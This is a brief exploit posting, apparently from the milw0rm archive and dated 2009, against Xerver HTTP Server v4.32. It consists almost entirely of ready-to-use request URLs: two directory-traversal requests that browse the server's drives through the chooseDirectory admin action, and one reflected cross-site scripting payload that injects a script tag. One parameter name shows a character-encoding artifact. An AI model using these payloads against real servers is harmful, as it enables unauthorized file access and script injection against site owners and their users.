Xerver HTTP Server v4.32 XSS / Directory Traversal Vulnerability
By Stack
Directory Traversal Exploit :
http://127.0.0.1:32123/action=chooseDirectory¤tPath=d:%5C
http://127.0.0.1:32123/action=chooseDirectory¤tPath=c:\
XSS Exploit :
http://127.0.0.1:32123/action=chooseDirectory¤tPath='">><script>alert('XSS By Stack')</script>
# milw0rm.com [2009-09-18]